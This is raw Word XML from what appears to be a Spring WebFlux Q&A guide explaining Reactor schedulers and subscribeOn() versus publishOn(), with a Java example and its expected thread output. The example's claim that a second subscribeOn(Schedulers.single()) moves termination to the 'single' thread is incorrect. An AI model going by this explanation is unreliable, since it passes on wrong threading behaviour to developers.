    <w:p w14:paraId="2FF005CD"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doOnTerminate(() -&gt; System.out.println("Operation Finished"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B5467"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ubscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181BF79"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699B4671"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04EA53D1" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9E340C"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publishOn(Schedulers.boundedElastic())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This moves the subsequent operations to a different thread pool (boundedElastic), which is typically used for I/O-bound operations (e.g., interacting with a database or network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F6FE6"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ubscribeOn(Schedulers.parallel())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This shifts the work done by the map function to the parallel thread pool, which is suitable for CPU-bound tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4A598"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doOnTerminate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is an action that will be executed when the subscription is completed (either successfully or with an error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0541864C" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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Benefits of Using Schedulers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9CF6D"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Non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the main thread remains free for other tasks, while heavy or blocking operations can run in dedicated thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02275CD2"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Improved Resource Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By choosing the right thread pools, you can optimize CPU-bound and I/O-bound operations, ensuring better performance and responsiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B209E0F"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oncurrency Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides control over which operations run concurrently, helping you avoid contention and improve system scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C8103"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Thread Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By offloading tasks to separate threads, you can isolate certain parts of the system to avoid interference, such as making network calls or performing time-consuming tasks without affecting other parts of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE3F96" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A1BC2" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1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chedulers in Spring WebFlux are crucial for managing the execution context of reactive operations. They help optimize the use of threads, offload blocking operations, and ensure non-blocking behavior. By choosing the right scheduler, you can ensure efficient execution of both CPU-bound and I/O-bound operations, improving performance, scalability, and responsiveness in a reactive system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78C67C"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B51B2F9">
          <v:rect id="_x0000_i2316" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5663449C" w14:textId="1DBDF8B9"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17" w:name="_Toc196307997"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can you explain how to schedule tasks using subscribeOn and publishOn</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="517"/>
    </w:p>
    <w:p w14:paraId="71F559AE" w14:textId="11488A33" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0"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Spring WebFlux (and reactive programming in general), both subscribeOn() and publishOn() are used to control the execution context of the reactive pipeline, but they have different roles in terms of task scheduling. Both of these methods are used to manage where and on which thread certain operations in the reactive pipeline will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E5095" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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subscribeOn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E66561"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he subscribeOn() method is used to specify </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on which thread the subscription and initial processing of the reactive pipeline should take place</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It affects the thread on which the entire pipeline is subscribed to and starts execution. This means that the subscribeOn() method defines the thread context for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first operation in the pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CC20D0"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he effect of subscribeOn() is applied to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of operators, not just the operation it is applied to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1313BEF5"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t controls where the subscription and data retrieval (like network calls or database access) will occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779165FD" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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publishOn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20028277"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he publishOn() method is used to specify </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on which thread the subsequent operations in the reactive pipeline should execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It affects the thread used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all subsequent operations after it is applied</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the pipeline. It does not affect earlier stages in the pipeline that have already been executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53C3E8"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he effect of publishOn() is applied </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only from the point of invocation onwards</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the reactive chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F695A"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t allows changing the execution thread for specific parts of the pipeline, especially when a particular operation might be I/O-bound (network call, database access) or CPU-bound (heavy computation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9AC3D" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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How do subscribeOn() and publishOn() work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE17474"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ubscribeOn()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D6D3E"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t sets the thread for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Any work done before the actual subscription happens will be executed on the thread defined in subscribeOn(). This method is typically used to set the thread for blocking operations (e.g., when the data is fetched or the subscription starts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D94BAF6"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publishOn()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD56E98"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t changes the execution thread for subsequent operations in the reactive stream pipeline, allowing you to offload heavy computation to a different thread, leaving the initial data fetching on the thread set by subscribeOn().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000A78C" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34284FBF"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et's break it down with an example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09881A79"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C4B2E"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scheduler.Schedulers;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CF887" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4927448F"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SchedulingExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E02E9"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static void main(String[] args) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374259C5"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Mono.just("Hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AAC18"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subscribeOn controls where the subscription happens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828D0D1"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ubscribeOn(Schedulers.boundedElastic())  // Perform initial subscription on a bounded elastic thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF88F7"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map(value -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96378F"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ystem.out.println("Map 1 on thread: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE3BE5"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value + " World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC9CF3"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280E1189"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publishOn controls where the next operation happens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC386F7"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shOn(Schedulers.parallel())  // Move next map operation to the parallel thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D9588"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map(value -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE8082"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ystem.out.println("Map 2 on thread: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6194F00A"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value.toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9905E"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34B42CBB"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subscribe and print the result on a new thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24DFD1"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ubscribeOn(Schedulers.single())  // Subscribe and print on a single thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB459E"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doOnTerminate(() -&gt; System.out.println("Terminated on thread: " + Thread.currentThread().getName()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A9F6D"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ubscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE3216B" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1385D36D"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Allow time for asynchronous operations to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CB000"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hread.sleep(1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8BAB4"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1CAF68E7"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105833C6" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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lastRenderedPageBreak/>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6DBD8"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ubscribeOn(Schedulers.boundedElastic())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ECA7B0"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first subscribeOn() is applied to the entire pipeline, meaning that the subscription (starting point) will happen on a bounded elastic thread pool. It is ideal for I/O-bound operations like fetching data from a database or external API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9E9F3"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first .map() operation will be executed on the bounded elastic thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0CF0A"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publishOn(Schedulers.parallel())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D3A294"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next .map() operation will be executed on a different thread, as specified by publishOn(Schedulers.parallel()). The parallel() scheduler is used for CPU-bound tasks and allows operations to run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4310C97A"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second .map() operation will be executed on the parallel thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E329F"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ubscribeOn(Schedulers.single())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B8EDC8"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fter the processing is completed, the final .subscribe() will be executed on a single-threaded scheduler (for demonstration purposes). This will output the final result on a single thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6686DA69" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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pected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75D64B"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ap 1 on thread: boundedElastic-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAE784"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ap 2 on thread: parallel-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C809ED9"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erminated on thread: single</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5ADA40"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HELLO WORLD!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173A6E9" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD7146F"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subscribeOn() affects the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the subscription, making it ideal for setting where the pipeline starts (typically used for blocking operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237AD5C"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publishOn() affects the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subsequent operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the stream and can be used to change the execution context for tasks that may benefit from running on a specific thread or thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D025D64"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publishOn() </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not affect the initial thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; it only affects operations that happen </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after it</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC59D4B" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E302987"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Use subscribeOn() to control the thread for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initial subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B5ED73"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Use publishOn() to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>switch execution context</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for subsequent operations, allowing you to optimize I/O and CPU-bound tasks by running them on appropriate thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421E578"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84BFB2F">
          <v:rect id="_x0000_i2317" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CF978" w14:textId="387F8F18"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18" w:name="_Toc196307998"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the concept of event-driven programming in the context of Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="518"/>
    </w:p>
    <w:p w14:paraId="7CB1C879" w14:textId="6DF5C7A7" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="004E6A4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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vent-Driven Programming in the Context of Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64CA75"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vent-driven programming is a programming paradigm in which the flow of the program is determined by events, such as user actions, messages from other programs, or sensors. In this approach, the program is composed of event listeners or event handlers that respond to events, and actions are triggered when these events occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B7D81F"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 WebFlux leverages event-driven programming for its non-blocking and asynchronous behavior, which makes it highly suitable for handling high concurrency and I/O-bound tasks. In Spring WebFlux, the application logic reacts to incoming HTTP requests as events, allowing for efficient resource management and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB1380" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>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Key Concepts in Event-Driven Programming in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1457E141"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ctive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
